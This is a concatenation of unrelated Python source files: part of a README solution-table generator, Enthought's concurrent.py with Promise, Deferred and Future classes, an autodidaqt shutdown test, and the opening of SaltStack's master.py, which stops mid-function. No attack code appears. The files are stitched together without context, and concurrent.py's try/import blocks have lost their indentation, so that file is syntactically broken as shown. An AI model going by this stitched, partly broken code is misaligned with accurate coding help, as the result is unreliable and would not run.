class MarkdownTableGenerator:
    """
    Markdown Table Generator
    :type table: MarkdownTableGenerator.ElasticTable
    :type links: list of MarkdownTableGenerator.MarkdownLink
    """
    def __init__(self, problems: Iterable[Problem]):
        self.table = self.ElasticTable(
            ("No.", "Id.", "Name", "Solutions", "Last Update"))
        self.links = list()
        # Pad each cell with one space on both sides when rendering.
        self.pad_column = True
        """ 在元素左右两边添加一个空格 """
        for problem in problems:
            if not problem.solutions:
                error("No solution found for %s", problem.display)
                continue
            def for_frontend(p: Problem):
                """ Render the text of the "No." column. """
                if p.metadata is None:
                    return "-"
                ordinal = p.metadata.frontend_id
                link = self.OrdinalLink(
                    problem=p,
                    text=ordinal,
                    label=f"p{ordinal}",
                    href=p.site_url, )
                self.links.append(link)
                return link.render_in_table()
            def for_ordinal(p: Problem):
                """ Render the text of the "Id." column. """
                if p.metadata is None :
                    return str(p.ordinal)
                else:
                    return str(p.metadata.id)
            def for_problem(p: Problem):
                """ Render the text of the "Name" column. """
                return p.display
            def for_solution(s: Solution):
                """ Render the text of the "Solutions" column. """
                link = self.SolutionLink(
                    solution=s,
                    text=s.category.name,
                    label=f"#{s.problem_no} {s.category.name.lower()}",
                    href=s.solution, )
                self.links.append(link)
                return link.render_in_table()
            # some string conversions.
            self.table.add_row((
                for_frontend(problem),
                for_ordinal(problem),
                for_problem(problem),
                "<br/>".join(map(for_solution, problem.solutions)),
                max([s.last_upd for s in problem.solutions]).strftime(
                    "%Y-%m-%d %H:%M"),
            ))

    class ElasticTable:
        """ A table whose column widths adapt to the widest cell seen.
        :type header: tuple[str]
        :type column: int
        :type widths: tuple[int]
        :type bodies: list[tuple[str]]
        """
        def __init__(self, header):
            self.header = header
            """ 表格标题 """
            self.column = len(header)
            """ 列数 """
            self.widths = tuple(len(s) for s in self.header)
            """ 各列的宽度 """
            self.bodies = list()
            """ 表格的内容 不包括标题、分隔行 """
        def add_row(self, row: Tuple[str, ...]):
            """Append a row, growing every column to fit its widest cell."""
            assert len(row) == self.column
            width_calculator = len
            self.widths = tuple(
                max(old, width_calculator(new)) for old, new in
                zip(self.widths, row))
            self.bodies.append(row)
        def __repr__(self) -> str:
            return f"{dict(zip(self.header, self.widths))}({len(self.bodies)})"

    class MarkdownLink(abc.ABC):
        """ Markdown Link reference ::
        [text][label]
        [label]: destination
        https://github.github.com/gfm/#link-reference-definition
        :type text: str
        :type label: str
        :type destination: str
        """
        def __init__(self, *, text, label, href):
            self.text = text
            """ 可见文字 """
            self.label = label
            """ 内部标志 """
            self.destination = href
            """ 目标地址 """
        def render_in_table(self):
            """Render the in-table reference, e.g. ``[text][label]``."""
            return f"[{self.text}][{self.label}]"
        def render_in_footer(self):
            """Render the footer definition; the destination is URL-quoted
            so paths containing spaces or CJK characters stay valid."""
            import urllib.parse
            return f"[{self.label}]: {urllib.parse.quote(self.destination)}"
        def __repr__(self) -> str:
            return self.destination
        def __str__(self) -> str:
            return f"[{self.text}][{self.label}]: {self.destination}"

    class SolutionLink(MarkdownLink):
        """ Solution Link reference
        :type solution: Solution
        """
        def __init__(self, solution, *, text, label, href):
            super().__init__(text=text, label=label, href=href)
            self.solution = solution
            """ 指向的解法对象 """

    class ProblemLink(MarkdownLink):
        """ Problem Link reference.
        Deprecated: the link now lives on the ordinal, not the problem name.
        :type problem: Problem
        """
        def __init__(self, problem, *, text, label, href):
            super().__init__(text=text, label=label, href=href)
            self.problem = problem
            """ 指向的解法对象 """
        def render_in_footer(self):
            # Problem URLs are already valid; skip the URL-quoting.
            return f"[{self.label}]: {self.destination}"

    class OrdinalLink(MarkdownLink):
        """ Ordinal Link reference
        :type problem: Problem
        """
        def __init__(self, problem, *, text, label, href):
            super().__init__(text=text, label=label, href=href)
            self.problem = problem
            """ 指向的解法对象 """
        def render_in_footer(self):
            # Problem URLs are already valid; skip the URL-quoting.
            return f"[{self.label}]: {self.destination}"

    def generate(self):
        """Render the table body and the link footer as two lists of lines."""
        lines = []
        links = []
        pad = 2 if self.pad_column else 0
        def p_fix_join(s: Iterable[str]):
            """ Append prefix and postfix to string """
            return "|".join(('', *s, ''))
        def print_header():
            lines.append(p_fix_join(
                col.center(max(w, w + pad))
                for col, w in zip(self.table.header, self.table.widths)))
        def print_separator():
            lines.append(p_fix_join(
                "-" * max(w, w + pad)
                for w in self.table.widths))
        def print_rows():
            lines.extend(p_fix_join(
                col.ljust(w).center(max(w, w + pad))
                for col, w in zip(row, self.table.widths))
                for row in self.table.bodies)
        def print_links():
            # Ordinal/problem links sort first (key 0), then solution links
            # grouped by language enum value, then by problem number.
            def link_sorter_key(link: 'MarkdownTableGenerator.MarkdownLink'):
                if isinstance(link, self.OrdinalLink):
                    return 0, link.problem.ordinal
                if isinstance(link, self.ProblemLink):
                    return 0, link.problem.ordinal
                if isinstance(link, self.SolutionLink):
                    return link.solution.category.value, \
                           link.solution.problem_no
            sorted_links = sorted(self.links, key=link_sorter_key)
            links.extend(
                link.render_in_footer()
                for link in sorted_links)
        print_header()
        print_separator()
        print_rows()
        print_links()
        return lines, links
def inplace_replace_readme_file(generator) -> bool:
    """Rewrite the generated section of README.md when its content changed.

    The section between the start/end marker comments is replaced with the
    output of *generator*; the file is only rewritten when the resulting
    content differs from what is already on disk (compared via MD5).

    :type generator: () -> tuple[list[str], list[str]]
    :return: whether the file was actually rewritten
    """
    file_hash = content_hasher()
    gens_hash = content_hasher()
    start_mark = '<!-- table of solutions -->'
    end_mark = '<!-- end of table of solutions -->'
    with open('README.md', 'r') as reader:
        # processing: currently inside the old generated section (skipped);
        # processed: the start marker has been seen at least once.
        processing = False
        processed = False
        file_lines = []
        for line in reader:
            file_hash += line
            if start_mark in line and line.startswith('<'):
                processing = True
            elif not processing:
                file_lines.append(line)
            elif end_mark in line:
                processing = False
                processed = True
                (lines, links) = generator()

                def new_line(s):
                    return s + "\n"

                file_lines.append(new_line(start_mark))
                file_lines.extend(map(new_line, lines))
                file_lines.append("\n")
                file_lines.extend(map(new_line, links))
                file_lines.append(new_line(end_mark))
        else:
            # BUG FIX: use sys.exit instead of the site-injected exit()
            # builtin, which is absent when run with `python -S`.
            if not processed:
                error("No %s found in README.md", start_mark)
                sys.exit(1)
            if processing:
                error("No %s found in README.md", end_mark)
                sys.exit(1)
    gens_hash += file_lines
    if file_hash == gens_hash:
        info("File content not changed, no writing is preformed.")
        return False
    with open('README.md', 'w') as writer:
        writer.writelines(file_lines)
    return True
# noinspection PyPep8Naming
class content_hasher:
    """Incremental MD5 over str/bytes content, fed via ``+=``.

    Strings are hashed UTF-8 encoded; any other iterable is hashed by
    recursively feeding its elements. Two hashers compare equal when they
    have digested identical content.
    """

    def __init__(self) -> None:
        self._md5 = hashlib.md5()

    def __iadd__(self, other):
        # BUG FIX: the branches are now a single if/elif chain. Previously
        # bytes fell through to the Iterable branch after being hashed and
        # were pointlessly re-iterated byte by byte (each int a no-op).
        if isinstance(other, bytes):
            self._md5.update(other)
        elif isinstance(other, str):
            self._md5.update(other.encode())
        elif isinstance(other, Iterable):
            for element in other:
                self.__iadd__(element)
        return self

    def __eq__(self, other):
        return isinstance(other, content_hasher) and \
               self._md5.digest() == other._md5.digest()

    def __hash__(self) -> int:
        return hash(self._md5.digest())
def main():
    """Main entry point.
    Other file could import and call this function."""
    generate_section = lambda: MarkdownTableGenerator(scan_for_problems()).generate()
    inplace_replace_readme_file(generate_section)


if __name__ == '__main__':
    main()
|
concurrent.py | #
#
# (C) Copyright 2013-2016 Enthought, Inc., Austin, TX
# All right reserved.
#
"""Module to support asynchronous execution of code."""
# System library imports.
try:
from __builtin__ import unicode as utext
except ImportError:
from builtins import str as utext
import sys
from threading import Thread, RLock
from functools import wraps
# Enthought library imports.
from traits.api import (HasTraits, Any, Range, Undefined, Instance, Str,
Property, Enum, ReadOnly, DelegatesTo, Event)
def set_trait_later(obj, trait, value):
    """Set ``obj.trait = value`` via the GUI utilities (deferred assignment).

    Thin wrapper over ``utils.gui.set_trait_later``; the import is local so
    GUI machinery is only pulled in when this is actually called.
    """
    from ..utils import gui
    gui.set_trait_later(obj, trait, value)
################################################################################
# `Signal` class.
################################################################################
class Signal(HasTraits):
    """ A minimal object-based signal emitting a single argument.

    Similar in spirit to (and inspired by) Qt's Signals, but instance based
    rather than a class-level descriptor: no declaration in the class body
    is needed, just instantiate a Signal object and use it directly.

    Usage:
    ------
    >>> s = Signal()
    >>> def func(arg):
    ...     print 'emitted:', arg
    >>> s.connect(func)
    >>> s.emit('value')
    emitted: value
    >>> s.disconnect(func)
    """
    # Backing trait; each emit() assigns to it, which notifies listeners.
    _event = Event

    def connect(self, listener):
        """ Register *listener* to be invoked with each emitted value. """
        self.on_trait_change(listener, '_event')

    def emit(self, value):
        """ Emit *value* to every connected listener. """
        self._event = value

    def disconnect(self, listener):
        """ Remove a previously connected *listener*. """
        self.on_trait_change(listener, '_event', remove=True)
def do_callback(dispatch, callback, *args):
    """Invoke *callback* with *args*, honoring the dispatch mode.

    ``dispatch == 'ui'`` defers the call to the GUI event loop; any other
    value invokes the callback synchronously on the current thread.
    """
    if dispatch != 'ui':
        callback(*args)
        return
    # Imported lazily so non-GUI users never pull in the GUI toolkit.
    from ..utils.gui import invoke_later
    invoke_later(callback, *args)
################################################################################
# `Promise` class.
################################################################################
class Promise(HasTraits):
    """ The promise of a deferred operation, which can be used
    to add success, failure and progress callbacks for the operation.
    The Promise instance has a ``dispatch`` trait which can be set to "same" or
    "ui" and if it is set to "ui" all changes and callbacks are made in the GUI
    thread.
    """
    def __init__(self, **traits):
        HasTraits.__init__(self, **traits)
        # This should really be a reader-writer lock for performance, but this
        # will do for the time being.
        self._lock = RLock()

    # `Promise` Interface #####################################################
    def on_done(self, callback):
        """ Add callback for successful completion of the operation.
        """
        # Snapshot the status under the lock so the callback is either
        # registered before completion or invoked immediately after —
        # never both, never neither.
        with self._lock:
            status = self._status
            if status == "pending":
                self.on_trait_change(lambda value: (self._status == 'done')
                                     and callback(self._result),
                                     '_status', dispatch=self.dispatch)
        # Release the lock before calling the callback. Status is done so nothing
        # will mutate further - we are safe.
        if status == "done":
            do_callback(self.dispatch, callback, self._result)

    def on_error(self, callback):
        """ Add callback for failure of the operation.
        """
        with self._lock:
            status = self._status
            if status == "pending":
                self.on_trait_change(lambda value: (self._status == 'error')
                                     and callback(self._error),
                                     '_status', dispatch=self.dispatch)
        # Release the lock before calling the callback. Status is done so nothing
        # will mutate further - we are safe.
        if status == "error":
            do_callback(self.dispatch, callback, self._error)

    def on_progress(self, callback):
        """ Add callback for progress of the operation.
        """
        with self._lock:
            status = self._status
            if status == "pending":
                self.on_trait_change(lambda value: callback(value),
                                     '_progress', dispatch=self.dispatch)
        # Release the lock before calling the callback. Status is done so nothing
        # will mutate further - we are safe.
        # NOTE(review): unlike on_done/on_error this re-reads self._status
        # instead of using the snapshot taken under the lock; a transition
        # between the two reads could deliver the progress callback twice —
        # confirm whether that is acceptable.
        if self._status == 'done':
            # If operation is already completed, call with 1.0
            do_callback(self.dispatch, callback, self._progress)

    #################################
    # Traits.
    # Dispatch all callbacks either in the same thread or in the UI thread.
    dispatch = Enum('same', 'ui')

    # Status of the Promise.
    status = Property
    _status = Enum('pending', 'done', 'error')

    def _get_status(self):
        with self._lock:
            return self._status

    # The result, if any.
    result = Property
    _result = Any(Undefined)

    def _get_result(self):
        # Raises until the operation has completed (done or error).
        with self._lock:
            if self._status == 'pending':
                raise ValueError('Promise not completed yet')
            else:
                return self._result

    # The error, if any.
    error = Property
    _error = Any(Undefined)

    def _get_error(self):
        # Raises until the operation has completed (done or error).
        with self._lock:
            if self._status == 'pending':
                raise ValueError('Promise not completed yet')
            else:
                return self._error

    # The progress.
    progress = Property
    _progress = Range(0.0, 1.0, 0.0)

    def _get_progress(self):
        with self._lock:
            return self._progress
################################################################################
# `Deferred` class.
################################################################################
class Deferred(HasTraits):
    """ A Deferred operations which will complete in the future.
    Usage:
    ------
    In an asynchronous method which would normally require you to accept a
    callback method, you can use the Deferred object to let callers add
    callbacks even after making the call, in fact even after the operation
    has finished.
    The following example illustrates the simplest use of a Future::
        def background_job():
            deferred = Deferred()
            # Some async job which takes a callback
            async_background_job(callback=lambda result: deferred.done(result))
            return deferred.promise()
        def on_job_finished(self, result):
            print result
        bg_job = background_job()
        # bg_job promise can be used add callbacks
        bg_job.on_done(on_job_finished)
    The advantages of this approach to passing callbacks are:
        - ability to add callbacks after the call has been made
        - ability to add callbacks even after the function has returned
        - pass around promise objects to let others add callacks for the job
          This can be useful for example to add a progress feature to
          an existing function which would have otherwise needed to add
          an extra progress_callback argument.
    The Deferred supports two dispatch mechanisms, "same" and "ui" if the
    ``dispatch`` trait is set to "ui" all attributes are set on the GUI thread
    and all callbacks are also called from the UI thread.
    Notes:
    ------
    Always return the promise() object for an operation to callers when using
    Deferred so that so that they can only add callbacks and not set result.
    """
    # `Deferred` Interface ####################################################
    def done(self, value):
        """ Complete the deferred with success and specified result.
        and set the progress to 1.0
        """
        # _status is written last in both branches so that listeners fired
        # by the status change observe the final result/progress values.
        if self.dispatch == 'ui':
            promise = self.promise
            set_trait_later(promise, '_result', value)
            set_trait_later(promise, '_progress', 1.0)
            set_trait_later(promise, '_status', 'done')
        else:
            with self.promise._lock:
                self.promise._result = value
                self.promise._progress = 1.0
                self.promise._status = 'done'

    def error(self, value):
        """ Complete the deferred with failure and specified result. """
        # As in done(): _status is set after _error so listeners see it.
        if self.dispatch == 'ui':
            promise = self.promise
            set_trait_later(promise, '_error', value)
            set_trait_later(promise, '_status', 'error')
        else:
            with self.promise._lock:
                self.promise._error = value
                self.promise._status = 'error'

    def progress(self, value):
        """ Set the progress of the operation (0 <= value <= 1). """
        if self.dispatch == 'ui':
            set_trait_later(self.promise, '_progress', value)
        else:
            with self.promise._lock:
                self.promise._progress = value

    # Traits ##################################################################
    # Dispatch all callbacks either in the same thread or in the UI thread.
    dispatch = Enum('same', 'ui')

    # The read-only Promise handed to callers; created lazily with the
    # same dispatch mode as this Deferred.
    promise = ReadOnly(Instance(Promise))

    def _promise_default(self):
        return Promise(dispatch=self.dispatch)
################################################################################
# `Future` class.
################################################################################
class Future(Promise):
    """
    This could be used for any long-running call that needs to run on
    another thread. The result of the call is stored in the `result` trait.
    Accessing the `result` trait will block till the thread completes its task.
    The `done` method can be used to check if the thread has completed.
    Optional progress information is available in a `progress` trait.
    Additional optional information is also available in the `info` trait.
    One can also set the ``dispatch`` mode to "ui" in which case all
    changes to attributes and callbacks are made on the GUI thread.

    The following example illustrates the simplest use of a Future::

        >>> import time
        >>> x = Future(lambda : time.sleep(1) or 'done')
        >>> assert x.done() is False
        >>> assert x.result == 'done'  # This will block.

    Here is a slightly more complex example illustrating the use of the
    ``f_on_progress`` and ``f_on_status`` callbacks::

        >>> def on_progress(future):
        ...     print future.progress
        ...
        >>> def on_status(future):
        ...     if future.status == 'done':
        ...         print future.result
        ...     elif future.status == 'error':
        ...         print future.error
        ...
        >>> def compute(future=None):
        ...     for i in range(5):
        ...         if future is not None:
        ...             future.info = str(i)
        ...             future.progress = (i+1)*0.2
        ...         time.sleep(0.1)
        ...     return 'done'
        ...
        >>> x = Future(compute, f_on_status=on_status,
        ...            f_on_progress=on_progress, future_kw='future')
        >>> for i in range(5):
        ...     print x.progress, x.info
        ...     time.sleep(0.1)
        ...
        >>> print x.result
    """

    # Status of the Future.  Mirrors the underlying promise's status
    # ('pending', 'done' or 'error').
    status = DelegatesTo('promise', 'status')

    # The result of the call. When accessed this will block unless the
    # thread has finished execution.
    result = Property(Any, depends_on='status')

    # The exception if any. ``sys.exc_info`` is stored here.
    error = DelegatesTo('promise', 'error')

    # Progress information.
    progress = Property(depends_on='promise._progress')

    # Optional information.
    info = Str('')

    #################################
    # Private Traits.

    # The thread in which the function is running.
    _thread = Instance(Thread)

    # The Deferred object for the operation and its promise.
    _deferred = Instance(Deferred)
    # Expose the deferred's promise as this Future's own promise.
    promise = DelegatesTo('_deferred', 'promise')

    ############################################################################
    # `object` interface.
    ############################################################################
    def __init__(self, func, f_on_status=None, f_on_progress=None,
                 future_kw=None, dispatch='same', args=None, kw=None):
        """Constructor for a Future.

        If an exception is raised when the future runs, ``sys.exc_info()``
        is stored in the error trait and the ``status`` is set to "error"

        Parameters
        ----------
        func : callable
            The callable to execute in another thread.
        f_on_status : callable
            The callable to callback when the status is changed. This function
            will be passed the `Future` instance as a single argument.
        f_on_progress : callable
            The callable to callback when the progress is changed. This function
            will be passed the `Future` instance as a single argument.
        future_kw : str
            The keyword argument of the callable that accepts a `Future`
            instance, typically used for progress info.
        args : additional args
            These are passed on to the callable.
        kw : additional keyword args
            Passed to the callable, ``func``.
        """
        # Set this first: the default `_deferred` (and its promise) read
        # self.dispatch when they are lazily created below.
        self.dispatch = dispatch
        super(Future, self).__init__()
        if f_on_progress is not None:
            # Adapt the signature: the promise passes the raw value, the
            # user callback expects the Future itself.
            self.on_progress(lambda value:f_on_progress(self))
        if f_on_status:
            # The same status callback fires for both success and failure.
            self.on_done(lambda value:f_on_status(self))
            self.on_error(lambda value:f_on_status(self))

        # The wrapper function to call in a thread.
        def _f(self, *args, **kw):
            """This function is called by the `Thread` instance."""
            try:
                self._deferred.done(func(*args, **kw))
            # Deliberately bare: any failure in the worker thread is
            # recorded on the deferred rather than killing the thread
            # silently.
            except:
                self._deferred.error(sys.exc_info())

        # Pass self to the function if it needs it.
        # NOTE(review): `utext` is presumably a py2/py3 text-type alias
        # defined earlier in this module -- confirm.
        if future_kw is not None and type(future_kw) in (str, utext):
            kw[future_kw] = self

        args = args or ()
        kw = kw or {}
        t = Thread(target=_f, args=(self,) + args, kwargs=kw)
        self._thread = t
        # Daemonize so a still-pending Future does not block interpreter
        # exit (standard daemon-thread semantics).
        t.daemon = True
        t.start()

    ############################################################################
    # `Future` interface.
    ############################################################################
    def done(self):
        """Return True if the future has completed execution."""
        return self.promise.status != 'pending'

    ############################################################################
    # `Promise` interface.
    ############################################################################
    def on_done(self, callback):
        """Register `callback` to be called when the future succeeds."""
        self.promise.on_done(callback)

    def on_error(self, callback):
        """Register `callback` to be called when the future fails."""
        self.promise.on_error(callback)

    def on_progress(self, callback):
        """Register `callback` to be called on progress updates."""
        self.promise.on_progress(callback)

    ############################################################################
    # Trait handlers.
    ############################################################################
    def _get_result(self):
        # _status is synchronized, so copy local to avoid constant lock acquisitions
        status = self.promise._status
        if status == 'pending':
            # Block until the worker thread finishes.
            self._thread.join()
            # Status will have switched to "done" or "error"
            status = self.promise._status
        if status == 'done':
            return self.promise.result
        else:
            # On error the result is Undefined; details live in `error`.
            return Undefined

    def _get_progress(self):
        return self.promise.progress

    def _set_progress(self, val):
        # Route writes through the deferred so dispatch/locking are honored.
        self._deferred.progress(val)

    def __deferred_default(self):
        return Deferred(dispatch=self.dispatch)
################################################################################
# `threaded` decorator.
################################################################################
def threaded(func=None, f_on_status=None, f_on_progress=None, future_kw=None,
             dispatch='same'):
    """ A decorator to run a function in a separate thread and return a
    `Future` object which will store the results when the function completes.

    Parameters
    ----------
    future_kw : str
        The keyword argument of the decorated function that accepts a `Future`
        instance.
    f_on_status : callable
        The callable to callback when the status is changed. This function
        will be passed the `Future` instance as a single argument.
    f_on_progress : callable
        The traits handler to callback when the progress is changed. Note
        that this is a traits handler.
    dispatch : str
        The dispatch mechanism to use. One of either 'same' or 'ui'.

    Examples
    ---------
    The following examples illustrates its usage::

        >>> import time
        >>> @threaded
        ... def compute(x):
        ...     # long running computation
        ...     time.sleep(x)
        ...     return x
        >>> a = compute(0.5)
        >>> b = compute(1.0)
        >>> print a.result, b.result

        >>> @threaded(future_kw='future')
        ... def compute_with_progress(dt, future):
        ...     for i in range(10):
        ...         time.sleep(dt)
        ...         future.progress = (i+1)*0.1
        ...     return time.time()
        ...
        >>> a = compute_with_progress(0.1)
        >>> # Future is automatically passed.
    """
    def future_decorator(func, f_on_status=f_on_status,
                         f_on_progress=f_on_progress,
                         future_kw=future_kw, dispatch=dispatch):
        def _wrapper(*args, **kw):
            """The wrapper function."""
            # BUGFIX: pass the call-time arguments through Future's
            # ``args``/``kw`` keyword parameters.  The previous
            # ``Future(..., dispatch, *args, **kw)`` bound the first extra
            # positional argument to Future's ``args`` parameter as a
            # scalar, breaking any decorated function called with
            # positional arguments (``(self,) + args`` then raised
            # TypeError inside Future.__init__).
            return Future(func, f_on_status, f_on_progress, future_kw,
                          dispatch, args=args, kw=kw)
        return wraps(func)(_wrapper)
    if func is None:
        # Called with arguments: @threaded(...) -- return the decorator.
        return future_decorator
    else:
        # Called bare: @threaded -- decorate immediately.
        return future_decorator(func, f_on_status, f_on_progress,
                                future_kw=future_kw, dispatch=dispatch)
|
connect_and_shutdown.py | from multiprocessing import Process
from autodidaqt_common.remote.command import ShutdownCommand
from autodidaqt_common.remote.config import RemoteConfiguration
from autodidaqt.core import CommandLineConfig
from autodidaqt.examples.scanning_experiment_revisited import app
from autodidaqt.remote.scheduler import PairScheduler
# Shared endpoint: the headless app (child process) and the scheduler
# (this process) both connect to this local TCP address.
remote_config = RemoteConfiguration("tcp://127.0.0.1:13133")
class TestScheduler(PairScheduler):
    # Drives a single scenario against the app under test: it should shut
    # down cleanly when asked.
    async def run_schedule(self):
        """Run the schedule: assert the app shuts down normally."""
        await self.shuts_down_normally()
def run():
    """Configure the example app as headless and start it.

    Intended to run in a child process; the scheduler talks to it over
    the ``remote_config`` endpoint.
    """
    config = CommandLineConfig(headless=True, remote_config=remote_config)
    app.configure_as_headless(config)
    app.start()
if __name__ == "__main__":
    # Launch the app in a separate process and drive it with the test
    # scheduler over the shared remote configuration.
    TestScheduler.run_with_standard_middleware(Process(target=run), remote_config)
|
master.py | '''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
import os
import re
import time
import errno
import fnmatch
import signal
import shutil
import stat
import logging
import hashlib
import datetime
try:
import pwd
except ImportError: # This is in case windows minion is importing
pass
import getpass
import resource
import subprocess
import multiprocessing
import sys
# Import third party libs
import zmq
import yaml
from M2Crypto import RSA
# Import salt libs
import salt.crypt
import salt.utils
import salt.client
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.search
import salt.key
import salt.fileserver
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.verify
import salt.utils.minions
import salt.utils.gzip_util
from salt.utils.debug import enable_sigusr1_handler
from salt.exceptions import SaltMasterError, MasterExit
from salt.utils.event import tagify
log = logging.getLogger(__name__)
def clean_proc(proc, wait_for_kill=10):
    '''
    Generic method for cleaning up multiprocessing procs

    Repeatedly asks ``proc`` to terminate, polling every 0.1s; if it is
    still alive after ``wait_for_kill`` polls, the failure is logged and
    the process is force-killed with SIGKILL.

    proc : multiprocessing.Process or None
        The process to clean up; falsy values are a no-op.
    wait_for_kill : int
        Number of 0.1s polls before escalating to SIGKILL.
    '''
    # NoneType and other fun stuff need not apply
    if not proc:
        return
    try:
        waited = 0
        while proc.is_alive():
            proc.terminate()
            waited += 1
            time.sleep(0.1)
            if proc.is_alive() and (waited >= wait_for_kill):
                log.error(
                    'Process did not die with terminate(): {0}'.format(
                        proc.pid
                    )
                )
                # BUGFIX: os.kill takes (pid, sig); the arguments were
                # previously reversed, so the forced kill never worked.
                os.kill(proc.pid, signal.SIGKILL)
    except (AssertionError, AttributeError):
        # Catch AssertionError when the proc is evaluated inside the child
        # Catch AttributeError when the process dies between proc.is_alive()
        # and proc.terminate() and turns into a NoneType
        pass
class SMaster(object):
    '''
    Create a simple salt-master, this will generate the top level master
    '''
    def __init__(self, opts):
        '''
        Create a salt master server instance

        opts : dict
            The master configuration options.
        '''
        self.opts = opts
        self.master_key = salt.crypt.MasterKeys(self.opts)
        self.key = self.__prep_key()
        self.crypticle = self.__prep_crypticle()

    def __prep_crypticle(self):
        '''
        Return the crypticle used for AES
        '''
        return salt.crypt.Crypticle(self.opts, self.opts['aes'])

    def __prep_key(self):
        '''
        A key needs to be placed in the filesystem with permissions 0400 so
        clients are required to run as root.

        Returns a dict mapping each ACL user name (from ``client_acl``,
        plus the configured master user and the current user) to a freshly
        generated key string, written to ``<cachedir>/.<user>_key``.
        '''
        users = []
        keys = {}
        acl_users = set(self.opts['client_acl'].keys())
        if self.opts.get('user'):
            acl_users.add(self.opts['user'])
        acl_users.add(getpass.getuser())
        # All user names known to the system, for validating ACL users.
        for user in pwd.getpwall():
            users.append(user.pw_name)
        for user in acl_users:
            log.info(
                'Preparing the {0} key for local communication'.format(
                    user
                )
            )
            # umask 191 == 0o277, so the keyfile is created owner-read-only.
            cumask = os.umask(191)
            if user not in users:
                try:
                    founduser = pwd.getpwnam(user)
                except KeyError:
                    # Unknown user: skip it rather than write an orphan key.
                    log.error('ACL user {0} is not available'.format(user))
                    continue
            keyfile = os.path.join(
                self.opts['cachedir'], '.{0}_key'.format(user)
            )
            if os.path.exists(keyfile):
                log.debug('Removing stale keyfile: {0}'.format(keyfile))
                os.unlink(keyfile)
            key = salt.crypt.Crypticle.generate_key_string()
            with salt.utils.fopen(keyfile, 'w+') as fp_:
                fp_.write(key)
            os.umask(cumask)
            # chmod 256 == 0o400: owner read-only.
            os.chmod(keyfile, 256)
            try:
                os.chown(keyfile, pwd.getpwnam(user).pw_uid, -1)
            except OSError:
                # The master is not being run as root and can therefore not
                # chown the key file
                pass
            keys[user] = key
        return keys
class Master(SMaster):
    '''
    The salt master server
    '''
    def __init__(self, opts):
        '''
        Create a salt master server instance
        '''
        SMaster.__init__(self, opts)

    def _clear_old_jobs(self):
        '''
        The clean old jobs function is the general passive maintenance process
        controller for the Salt master. This is where any data that needs to
        be cleanly maintained from the master is maintained.

        Runs forever (in its own process): scrubs the job cache, rotates
        the AES session key, refreshes the search index, updates the
        fileserver backends and evaluates the master schedule.
        '''
        jid_root = os.path.join(self.opts['cachedir'], 'jobs')
        search = salt.search.Search(self.opts)
        last = int(time.time())
        rotate = int(time.time())
        fileserver = salt.fileserver.Fileserver(self.opts)
        # NOTE(review): salt.loader and salt.utils.schedule are used here
        # but not imported at the top of this module -- presumably pulled
        # in transitively by another salt import; confirm.
        runners = salt.loader.runner(self.opts)
        schedule = salt.utils.schedule.Schedule(self.opts, runners)
        while True:
            now = int(time.time())
            loop_interval = int(self.opts['loop_interval'])
            if self.opts['keep_jobs'] != 0 and (now - last) >= loop_interval:
                # Scrub invalid and expired job cache directories.
                cur = '{0:%Y%m%d%H}'.format(datetime.datetime.now())
                if os.path.exists(jid_root):
                    for top in os.listdir(jid_root):
                        t_path = os.path.join(jid_root, top)
                        for final in os.listdir(t_path):
                            f_path = os.path.join(t_path, final)
                            jid_file = os.path.join(f_path, 'jid')
                            if not os.path.isfile(jid_file):
                                continue
                            with salt.utils.fopen(jid_file, 'r') as fn_:
                                jid = fn_.read()
                            if len(jid) < 18:
                                # Invalid jid, scrub the dir
                                shutil.rmtree(f_path)
                            elif int(cur) - int(jid[:10]) > \
                                    self.opts['keep_jobs']:
                                shutil.rmtree(f_path)
            if self.opts.get('publish_session'):
                # Periodically drop a fresh AES key file for rotation.
                if now - rotate >= self.opts['publish_session'] * 60:
                    salt.crypt.dropfile(self.opts['cachedir'])
                    rotate = now
            if self.opts.get('search'):
                if now - last >= self.opts['search_index_interval']:
                    search.index()
            try:
                if not fileserver.servers:
                    # BUGFIX: added the missing space between the two
                    # concatenated string fragments ("...not be" "able...").
                    log.error('No fileservers loaded, The master will not be '
                              'able to serve files to minions')
                    raise SaltMasterError('No fileserver backends available')
                fileserver.update()
            except Exception as exc:
                log.error(
                    'Exception {0} occurred in file server update'.format(exc)
                )
            try:
                schedule.eval()
                # Check if scheduler requires lower loop interval than
                # the loop_interval setting
                if schedule.loop_interval < loop_interval:
                    loop_interval = schedule.loop_interval
            except Exception as exc:
                log.error(
                    'Exception {0} occurred in scheduled job'.format(exc)
                )
            last = now
            try:
                time.sleep(loop_interval)
            except KeyboardInterrupt:
                break

    def __set_max_open_files(self):
        '''
        Raise the soft RLIMIT_NOFILE toward the configured
        ``max_open_files`` value, capped by the hard limit.
        '''
        # Let's check to see how our max open files(ulimit -n) setting is
        mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
        if mof_h == resource.RLIM_INFINITY:
            # Unclear what to do with infinity... OSX reports RLIM_INFINITY as
            # hard limit,but raising to anything above soft limit fails...
            mof_h = mof_s
        log.info(
            'Current values for max open files soft/hard setting: '
            '{0}/{1}'.format(
                mof_s, mof_h
            )
        )
        # Let's grab, from the configuration file, the value to raise max open
        # files to
        mof_c = self.opts['max_open_files']
        if mof_c > mof_h:
            # The configured value is higher than what's allowed
            log.info(
                'The value for the \'max_open_files\' setting, {0}, is higher '
                'than what the user running salt is allowed to raise to, {1}. '
                'Defaulting to {1}.'.format(mof_c, mof_h)
            )
            mof_c = mof_h
        if mof_s < mof_c:
            # There's room to raise the value. Raise it!
            log.info('Raising max open files value to {0}'.format(mof_c))
            resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
            try:
                mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
                log.info(
                    'New values for max open files soft/hard values: '
                    '{0}/{1}'.format(mof_s, mof_h)
                )
            except ValueError:
                # https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
                # A user under OSX reported that our 100000 default value is
                # still too high.
                log.critical(
                    'Failed to raise max open files setting to {0}. If this '
                    'value is too low. The salt-master will most likely fail '
                    'to run properly.'.format(
                        mof_c
                    )
                )

    def _pre_flight(self):
        '''
        Run pre flight checks, if anything in this method fails then the master
        should not start up
        '''
        errors = []
        fileserver = salt.fileserver.Fileserver(self.opts)
        if not fileserver.servers:
            errors.append(
                'Failed to load fileserver backends, the configured backends '
                'are:\n{0}'.format(
